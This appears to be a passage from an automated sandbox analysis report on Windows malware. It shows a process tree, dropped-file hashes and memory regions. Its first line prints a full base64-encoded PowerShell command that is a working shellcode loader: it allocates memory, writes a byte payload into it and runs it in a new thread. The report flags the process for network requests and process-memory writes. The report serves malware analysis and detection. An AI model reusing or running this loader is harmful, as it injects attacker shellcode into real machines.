          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JABuAGYASQAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAG4AZgBJACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAZQAsADAAeAAzADEALAAwAHgAZABkACwAMAB4ADgAYgAsADAAeAAyADQALAAwAHgAZABhACwAMAB4AGQAYgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYwAsADAAeAAzADEALAAwAHgANwAwACwAMAB4ADEANQAsADAAeAA4ADMALAAwAHgAYwAwACwAMAB4ADAANAAsADAAeAAwADMALAAwAHgANwAwACwAMAB4ADEAMQAsADAAeABlADIALAAwAHgAYwA0ACwAMAB4ADIAMQAsADAAeAA2ADMALAAwAHgAYQA2ACwAMAB4ADIANgAsADAAeABkAGEALAAwAHgANwA0ACwAMAB4AGMANwAsADAAeABhAGYALAAwAHgAMwBmACwAMAB4ADQANQAsADAAeABjADcALAAwAHgAYwBiACwAMAB4ADMANAAsADAAeABmADYALAAwAHgAZgA3ACwAMAB4ADkAOAAsADAAeAAxADkALAAwAHgAZgBiACwAMAB4ADcAYwAsADAAeABjAGMALAAwAHgAOAA5ACwAMAB4ADgAOAAsADAAeABmADEALAAwAHgAZAA4ACwAMAB4AGIAZQAsADAAeAAzADkALAAwAHgAYgBmACwAMAB4ADMAZQAsADAAeABmADAALAAwAHgAYgBhACwAMAB4AGUAYwAsADAAeAAwADIALAAwAHgAOQAzACwAMAB4ADMAOAAsADAAeABlAGYALAAwAHgANQA2ACwAMAB4ADcAMwAsADAAeAAwADAALAAwAHgAMgAwACwAMAB4AGEAYgAsADAAeAA3ADIALAAwAHgANAA1ACwAMAB4ADUAZAAsADAAeAA0ADEALAAwAHgAMgA2ACwAMAB4ADEAZQAsADAAeAAyADkALAAwAHgAZgA3ACwAMAB4AGQANwAsADAAeAAyAGIALAAwAHgANgA3ACwAMAB4AGMAYgAsADAAeAA1AGMALAAwAHgANgA3ACwAMAB4ADYAOQAsADAAeAA0AGIALAAwAHgAOAAwACwAMAB4ADMAMAAsADAAeAA4ADgALAAwAHgANwBhACwAMAB4ADEANwAsADAAeAA0AGEALAAwAHgAZAAzACwAMAB4ADUAYwAsADAAeAA5ADkALAAwAHgAOQBmACwAMAB4ADYAZgAsADAAeABkADUALAAwAHgAOAAxACwAMAB4AGYAYwAsADAAeAA0AGEALAAwAHgAYQBjACwAMAB4ADMAYQAsADAAeAAzADYALAAwAHgAMgAwACwAMAB4ADIAZgAsADAAeABlAGIALAAwAHgAMAA2ACwAMAB4AGMAOQAsADAAeAA4ADMALAAwAHgAZAAyACwAMAB4AGEANgAsADAAeAAzADgALAAwAHgAZABhACwAMAB4ADEAMwAsADAAeAAwADAALAAwAHgAYQAzACwAMAB4AGEAOQAsADAAeAA2AGQALAAwAHgANwAyACwAMAB4ADUAZQAsADAAeABhADkALAAwAHgAYQA5ACwAMAB4ADAAOAAsADAAeAA4ADQALAAwAHgAMwBjACwAMAB4ADIAYQAsADAAeABhAGEALAAwAHgANABmACwAMAB4AGUANgAsADAAeAA5ADYALAAwAHgANABhACwAMAB4ADgAMwAsADAAeAA3ADAALAAwAHgANQBjACwAMAB4ADQAMAAsADAAeAA2ADgALAAwAHgAZgA3ACwAMAB4ADMAYQAsADAAeAA0ADUALAAwAHgANgBmACwAMAB4AGQANAAsADAAeAAzADAALAAwAHgANwAxACwAMAB4AGUANAAsADAAeABkAGIALAAwAHgAOQA2ACwAMAB4AGYAMwAsADAAeABiAGUALAAwAHgAZgBmACwAMAB4ADMAMgAsADAAeAA1AGYALAAwAHgANgA0ACwAMAB4ADkAZQAsADAAeAA2ADMALAAwAHgAMAA1ACwAMAB4AGMAYgAsADAAeAA5AGYALAAwAHgANwA0ACwAMAB4AGUANgAsADAAeABiADQALAAwAHgAMAA1ACwAMAB4AGYAZQAsADAAeAAwAGIALAAwAHgAYQAwACwAMAB4ADMANAAsADAAeAA1AGQALAAwAHgANAA0ACwAMAB4ADAANQAsADAAeAA3ADQALAAwAHgANQBlACwAMAB4ADkANAAsADAAeAAwADEALAAwAHgAMABmACwAMAB4ADIAZAAsADAAeABhADYALAAwAHgAOABlACwAMAB4AGIAYgAsADAAeABiADkALAAwAHgAOABhACwAMAB4ADQANwAsADAAeAA2ADUALAAwAHgAMwBkACwAMAB4AGUAYwAsADAAeAA3AGQALAAwAHgAZAAxACwAMAB4AGQAMQAsADAAeAAxADMALAAwAHgANwBlACwAMAB4ADIAMQAsADAAeABmAGIALAAwAHgAZAA3ACwAMAB4ADIAYQAsADAAeAA3ADEALAAwAHgAOQAzACwAMAB4AGYAZQAsADAAeAA1ADIALAAwAHgAMQBhACwAMAB4ADYAMwAsADAAeABmAGUALAAwAHgAOAA2ACwAMAB4ADgAYwAsADAAeAAzADMALAAwAHgANQAwACwAMAB4ADcAOQAsADAAeAA2AGMALAAwAHgAZQA0ACwAMAB4ADEAMAAsADAAeAAyADkALAAwAHgAMAA0ACwAMAB4AGUAZQAsADAAeAA5AGUALAAwAHgAMQA2ACwAMAB4ADMANAAsADAAeAAxADEALAAwAHgANwA1ACwAMAB4ADMAZgAsADAAeAA1AGMALAAwAHgAZQA1ACwAMAB4ADcANgAsADAAeAA0ADAALAAwAHgAOQBjACwAMAB4ADgAZQAsADAAeAAxADMALAAwAHgAMwAzACwAMAB4AGUAOAAsADAAeAAwADMALAAwAHgAYgA5ACwAMAB4ADkAZAAsADAAeAA3ADMALAAwAHgAYgAzACwAMAB4ADIAYwAsADAAeABlADIALAAwAHgAMQBiACwAMAB4AGUAMgAsADAAeAA4ADcALAAwAHgAZAA2ACwAMAB4ADUAYgAsADAAeAAwAGIALAAwAHgAMAAyACwAMAB4ADkAZAAsADAAeAAxAGIALAAwAHgAZQA4ACwAMAB4AGMANwAsADAAeABhADgALAAwAHgAYwBiACwAMAB4ADcAOAAsADAAeAAxAGEALAAwAHgAYQBkACwAMAB4AGUAYgAsADAAeAAyADgALAAwAHgAOQAzACwAMAB4ADQAYgAsADAAeAA4ADEALAAwAHgAZAA4ACwAMAB4AGYANQAsADAAeABjADQALAAwAHgAMwBkACwAMAB4ADQAMAAsADAAeAA1AGMALAAwAHgAOQBlACwAMAB4AGQAYwAsADAAeAA4AGQALAAwAHgANABhACwAMAB4AGQAYQAsADAAeABkAGUALAAwAHgAMAA2ACwAMAB4ADcAOQAsADAAeAAxAGEALAAwAHgAOQAwACwAMAB4AGUAZQAsADAAeABmADQALAAwAHgAMAA4ACwAMAB4ADQANAAsADAAeAAxAGYALAAwAHgANAAzACwAMAB4ADcAMgAsADAAeABjADIALAAwAHgAMgAwACwAMAB4ADcAOQAsADAAeAAxADkALAAwAHgAZQBhACwAMAB4AGIANAAsADAAeAA4ADYALAAwAHgAOAA4ACwAMAB4AGIAZAAsADAAeAAyADAALAAwAHgAOAA1ACwAMAB4AGUAZAAsADAAeAA4ADkALAAwAHgAZQBlACwAMAB4ADcANgAsADAAeABkADgALAAwAHgAOAAyACwAMAB4ADIANwAsADAAeABlADMALAAwAHgAYQAzACwAMAB4AGYAYwAsADAAeAA0ADcALAAwAHgAZQAzACwAMAB4ADIAMwAsADAAeABmAGMALAAwAHgAMQAxACwAMAB4ADYAOQAsADAAeAAyADQALAAwAHgAOQA0ACwAMAB4AGMANQAsADAAeABjADkALAAwAHgANwA3ACwAMAB4ADgAMQAsADAAeAAwADkALAAwAHgAYwA0ACwAMAB4AGUAYgAsADAAeAAxAGEALAAwAHgAOQBjACwAMAB4AGUANwAsADAAeAA1AGQALAAwAHgAYwBmACwAMAB4ADMANwAsADAAeAA4ADAALAAwAHgANgAzACwAMAB4ADMANgAsADAAeAA3AGYALAAwAHgAMABmACwAMAB4ADkAYgAsADAAeAAxAGQALAAwAHgAOAAxACwAMAB4ADcAMwAsADAAeAA0AGEALAAwAHgANQBiACwAMAB4AGYANwAsADAAeAA5AGQALAAwAHgANABlADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABGAGUAUwBOAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABGAGUAUwBOAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABGAGUAUwBOACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7AA==
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:5004
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uzywrygi\uzywrygi.cmdline"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4484
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES414F.tmp" "c:\Users\Admin\AppData\Local\Temp\uzywrygi\CSC2CE0F1BBE9C943938DB8A4B02DA6D6C7.TMP"
              6⤵
                PID:4776

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

      Filesize

      53KB

      MD5

      06ad34f9739c5159b4d92d702545bd49

      SHA1

      9152a0d4f153f3f40f7e606be75f81b582ee0c17

      SHA256

      474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

      SHA512

      c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

    • C:\Users\Admin\AppData\Local\Temp\RES414F.tmp

      Filesize

      1KB

      MD5

      32301361b323937c28a85c9e3626607b

      SHA1

      4476c5069156ae769ee91eef123c51204f20468c

      SHA256

      e3da5c07c50ac0166d7a7391687a256973c6c59e01a2dc147c376bcb3f383aa6

      SHA512

      5c7cd2b42fed276f134261677fdb3f733e6ae4e45bd9d10a974de93f90440fd75bd93c024e2fe2f4c2bef24f0c032deffb933d62855f9051ebd4d8651c4ef243

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0rpvq3ti.e51.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\uzywrygi\uzywrygi.dll

      Filesize

      3KB

      MD5

      71bbf2f34607364c50420c9db477d25c

      SHA1

      78febc656937380b72684fa09f74d707d5a669eb

      SHA256

      d3dcc264749ebcef1489722ddd0a1f72547cde119d091b50c53eec33d8b4a9a5

      SHA512

      a5d8532c9a8bc43d3d2681e8a96dd67a277d62be5bf90cab9d135132eeccfda570634e803ca87a14fac959e22e1db9559b09841e27387cb72c9ffbc0df4ad139

    • \??\c:\Users\Admin\AppData\Local\Temp\uzywrygi\CSC2CE0F1BBE9C943938DB8A4B02DA6D6C7.TMP

      Filesize

      652B

      MD5

      7b179e0bbe6cdabcb8adb8846f7ab4e8

      SHA1

      d7e4dfdf2f378f889f652008abd204c81de3660b

      SHA256

      5b850be8355ad0509406ad1d3ced0173a62b7dd4c7004437669fd12f1ac3edec

      SHA512

      ac5143f24ddace9a581653e8ed80bda120f93544a822a16d3a3552e57f9c666c60075d76e4cbff8b4f10199f23375655fa8a5109565edf84a398d7383d310e35

    • \??\c:\Users\Admin\AppData\Local\Temp\uzywrygi\uzywrygi.0.cs

      Filesize

      557B

      MD5

      7319070c34daa5f6f2ece2dfc07119ee

      SHA1

      f26a4a48518a5608e93c8b77368f588b0433973c

      SHA256

      b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

      SHA512

      34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

    • \??\c:\Users\Admin\AppData\Local\Temp\uzywrygi\uzywrygi.cmdline

      Filesize

      369B

      MD5

      9b594472d3edd2866e41a9409e174c28

      SHA1

      fb712249b60038b2d2b4c690acf70a7c78774281

      SHA256

      962cfab3660f467575af9bd80140232b991b0eb58f8c5ac5cc8e35229376f17c

      SHA512

      ef277ee443c64be051e9add3a2d2ec818b519223739fababc9806784fb05017e508f4eaf31bfb4bb618a22772048ea358d966302f6095972f3f3466d2901bbaa

    • memory/720-0-0x0000000000400000-0x0000000000476000-memory.dmp

      Filesize

      472KB

    • memory/1988-21-0x0000000074E70000-0x0000000075620000-memory.dmp

      Filesize

      7.7MB

    • memory/1988-33-0x0000000006490000-0x00000000064AA000-memory.dmp

      Filesize

      104KB

    • memory/1988-63-0x0000000074E70000-0x0000000075620000-memory.dmp

      Filesize

      7.7MB

    • memory/1988-32-0x0000000007900000-0x0000000007F7A000-memory.dmp

      Filesize

      6.5MB

    • memory/1988-22-0x0000000074E70000-0x0000000075620000-memory.dmp

      Filesize

      7.7MB

    • memory/3644-5-0x00000000056D0000-0x00000000056F2000-memory.dmp

      Filesize

      136KB

    • memory/3644-3-0x0000000005B80000-0x00000000061A8000-memory.dmp

      Filesize

      6.2MB

    • memory/3644-19-0x0000000006790000-0x00000000067AE000-memory.dmp

      Filesize

      120KB

    • memory/3644-9-0x00000000061B0000-0x0000000006504000-memory.dmp

      Filesize

      3.3MB

    • memory/3644-7-0x0000000005AE0000-0x0000000005B46000-memory.dmp

      Filesize

      408KB

    • memory/3644-8-0x0000000074E70000-0x0000000075620000-memory.dmp

      Filesize

      7.7MB

    • memory/3644-6-0x0000000005970000-0x00000000059D6000-memory.dmp

      Filesize

      408KB

    • memory/3644-20-0x0000000006830000-0x000000000687C000-memory.dmp

      Filesize

      304KB

    • memory/3644-1-0x0000000074E7E000-0x0000000074E7F000-memory.dmp

      Filesize

      4KB

    • memory/3644-4-0x0000000074E70000-0x0000000075620000-memory.dmp

      Filesize

      7.7MB

    • memory/3644-2-0x0000000002ED0000-0x0000000002F06000-memory.dmp

      Filesize

      216KB

    • memory/3644-59-0x0000000074E7E000-0x0000000074E7F000-memory.dmp

      Filesize

      4KB

    • memory/3644-60-0x0000000074E70000-0x0000000075620000-memory.dmp

      Filesize

      7.7MB

    • memory/5004-57-0x0000000006CE0000-0x0000000006CE1000-memory.dmp

      Filesize

      4KB

    • memory/5004-55-0x0000000006080000-0x0000000006088000-memory.dmp

      Filesize

      32KB